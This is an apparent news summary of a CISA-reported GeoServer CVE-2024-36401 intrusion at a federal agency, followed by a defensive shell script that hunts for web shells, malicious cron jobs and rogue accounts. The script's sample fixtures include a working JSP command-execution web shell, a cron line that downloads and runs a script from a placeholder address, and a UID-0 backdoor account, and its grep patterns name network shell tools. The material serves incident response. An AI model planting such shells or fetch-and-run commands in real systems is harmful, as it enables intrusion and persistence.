
"On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living-off-the-land (LOTL) techniques,"
"On July 24, ten days after the bug was added to the KEV list, the threat actor exploited the same vulnerability in another GeoServer instance belonging to the same agency. The attackers dropped web shells and created cron jobs and user accounts to maintain persistence, and then attempted to escalate privileges, including by exploiting the Dirty COW vulnerability in the Linux kernel."
"The threat actor also used brute force attacks to obtain passwords allowing it to move laterally and elevate privileges, performed reconnaissance using readily available tools, downloaded payloads using PowerShell, and deployed the Stowaway multi-level proxy tool for command-and-control (C&C). The cyber threat actors remained undetected in the organization's environment for three weeks before the organization's SOC identified the compromise using their EDR tool,"
CVE-2024-36401, a remote code execution flaw in GeoServer, was exploited to compromise a federal civilian executive branch agency. The threat actor exploited it on July 11, 2024, gained access to a GeoServer instance, moved laterally to a web server and an SQL server, and uploaded web shells and remote-access scripts. On July 24 the same vulnerability was exploited in a second GeoServer instance at the agency; the attackers dropped web shells, created cron jobs and user accounts for persistence, and attempted privilege escalation, including through the Dirty COW Linux kernel vulnerability. The actor also used brute-force attacks, readily available reconnaissance tools, payloads downloaded with PowerShell, living-off-the-land techniques, and the Stowaway multi-level proxy for command and control, remaining undetected for three weeks before the agency's SOC spotted the intrusion with its EDR tool.
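The summary above names the persistence artifacts an incident responder would look for on a compromised Linux GeoServer host: web shells dropped in the web tree, cron jobs, and newly created accounts. The script below is an added example, not code from the SecurityWeek or CISA reporting. It flags JSP files under a webapps tree that hand request input to a command-execution API (the shape China Chopper-style JSP shells take), crontab lines that fetch or run staged payloads, and accounts that are missing from a baseline /etc/passwd snapshot or hold UID 0 without being root. The directory layout, detection patterns, sample files, and the 203.0.113.10 address (a documentation range) are all constructed for the example.

```shell
#!/usr/bin/env sh
# Added example: heuristic persistence hunt for a Linux GeoServer host.
# Patterns and sample data are constructed; tune them to your environment.

# list_jsp_shells DIR: print .jsp files under DIR that call a command-execution API.
list_jsp_shells() {
  find "$1" -type f -name '*.jsp' | sort | while IFS= read -r f; do
    grep -qE 'Runtime\.getRuntime\(\)\.exec|ProcessBuilder' "$f" && printf '%s\n' "$f"
  done
  return 0
}

# suspicious_cron FILE: print non-comment crontab lines that pull from the network,
# open a reverse connection, decode inline payloads, or run from world-writable dirs.
suspicious_cron() {
  grep -vE '^[[:space:]]*(#|$)' "$1" \
    | grep -E '(curl|wget|/dev/tcp/|(^|[^[:alnum:]_])nc[[:space:]]|ncat|/tmp/|/dev/shm/|/var/tmp/|base64 -d)' \
    || true
}

# new_or_uid0_accounts BASELINE CURRENT: print accounts present in CURRENT but absent
# from the BASELINE passwd snapshot, plus any non-root account with UID 0.
new_or_uid0_accounts() {
  awk -F: 'NR == FNR { seen[$1] = 1; next }
           !($1 in seen) || ($3 == 0 && $1 != "root") { print $1 }' "$1" "$2"
}

# Constructed sample data standing in for the host's real files (not from the incident).
SAMPLE=$(mktemp -d)
mkdir -p "$SAMPLE/webapps/geoserver/data"
printf '<%% out.println("GeoServer"); %%>\n' > "$SAMPLE/webapps/geoserver/index.jsp"
cat > "$SAMPLE/webapps/geoserver/data/cmd.jsp" <<'EOF'
<%@ page import="java.io.*" %>
<% Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); %>
EOF
cat > "$SAMPLE/crontab" <<'EOF'
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * geoserver curl -fsSL http://203.0.113.10/u.sh | sh
EOF
cat > "$SAMPLE/passwd.baseline" <<'EOF'
root:x:0:0:root:/root:/bin/bash
geoserver:x:998:998::/opt/geoserver:/usr/sbin/nologin
EOF
cat > "$SAMPLE/passwd.now" <<'EOF'
root:x:0:0:root:/root:/bin/bash
geoserver:x:998:998::/opt/geoserver:/usr/sbin/nologin
sysadm:x:0:0::/var/tmp:/bin/bash
EOF

# On a real host, point these at the servlet container's webapps directory,
# /etc/crontab plus /etc/cron.d/* and /var/spool/cron/crontabs/*, and a passwd
# snapshot taken when the system was built.
echo "== web shell candidates ==";  list_jsp_shells "$SAMPLE/webapps"
echo "== suspicious cron lines ==";  suspicious_cron "$SAMPLE/crontab"
echo "== new or UID 0 accounts =="; new_or_uid0_accounts "$SAMPLE/passwd.baseline" "$SAMPLE/passwd.now"
```

Each function takes file paths, so the same checks run unchanged against a mounted disk image during forensics. The grep patterns are deliberately broad and will need review: a legitimate backup job that uses curl, for example, would be listed.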
Read at SecurityWeek